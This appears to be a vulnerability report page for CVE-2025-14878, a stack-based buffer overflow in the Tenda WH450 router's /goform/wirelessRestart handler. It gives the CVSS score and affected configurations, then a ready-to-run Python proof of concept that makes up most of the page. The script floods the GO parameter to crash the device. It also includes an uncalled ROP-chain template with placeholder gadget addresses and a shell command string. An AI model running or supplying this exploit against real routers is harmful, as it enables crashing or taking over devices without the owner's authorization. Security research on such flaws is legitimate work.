Security Vulnerability Report
CVE-2025-14878 CVSS 9.8 CRITICAL

Published: 2025-12-18 16:15:53
Last Modified: 2026-02-24 06:16:27

Description

A security flaw has been discovered in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/wirelessRestart of the component HTTP Request Handler. The manipulation of the argument GO results in a stack-based buffer overflow. The attack can be performed remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda WH450 < 1.0.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-14878 PoC - Tenda WH450 /goform/wirelessRestart Buffer Overflow
# Target: Tenda WH450 Router (Firmware 1.0.0.18)


def exploit_buffer_overflow(target_ip, target_port=80):
    """
    Exploit for CVE-2025-14878 - Stack-based buffer overflow in /goform/wirelessRestart

    Args:
        target_ip: Target router IP address
        target_port: HTTP service port (default: 80)

    Returns:
        bool: True if exploit sent successfully
    """
    target_url = f"http://{target_ip}:{target_port}/goform/wirelessRestart"

    # Create overflow payload - 500 bytes to trigger buffer overflow
    # This will overwrite stack memory including return address
    payload = "A" * 500

    # Prepare POST data with GO parameter containing overflow payload
    data = {
        "GO": payload
    }

    try:
        print(f"[*] Sending exploit payload to {target_url}")
        print(f"[*] Payload length: {len(payload)} bytes")

        # Send malicious request
        response = requests.post(target_url, data=data, timeout=5)

        print(f"[+] Exploit request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        return True
    except requests.exceptions.Timeout:
        print("[+] Target may be vulnerable - connection timeout (possible crash)")
        return True
    except requests.exceptions.ConnectionError:
        print("[+] Target may be vulnerable - connection refused (possible crash)")
        return True
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False


def create_rop_payload():
    """
    Generate ROP chain payload for code execution
    This is a template - actual ROP gadgets depend on firmware version
    """
    # ROP gadgets for Tenda WH450 1.0.0.18
    rop_chain = ""

    # Stack pivot gadget address
    rop_chain += "\xaa\xbb\xcc\xdd"  # Stack pivot

    # Pop gadgets to setup registers
    rop_chain += "\x11\x22\x33\x44"  # Pop gadget address
    rop_chain += "\xee\xff\x00\x00"  # Value for $t9

    # System function address
    rop_chain += "\x55\x66\x77\x88"  # system() address

    # Return address
    rop_chain += "\x99\xaa\xbb\xcc"  # Next gadget or nop slide

    # Command string
    rop_chain += "/bin/sh -c whoami\x00"

    # Pad to 500 bytes
    rop_chain = rop_chain.ljust(500, "\x90")
    return rop_chain


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14878.py <target_ip> [port]")
        print("Example: python cve-2025-14878.py 192.168.0.1 80")
        sys.exit(1)

    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80

    print("=" * 60)
    print("CVE-2025-14878 - Tenda WH450 Buffer Overflow Exploit")
    print("=" * 60)

    exploit_buffer_overflow(target, port)
```
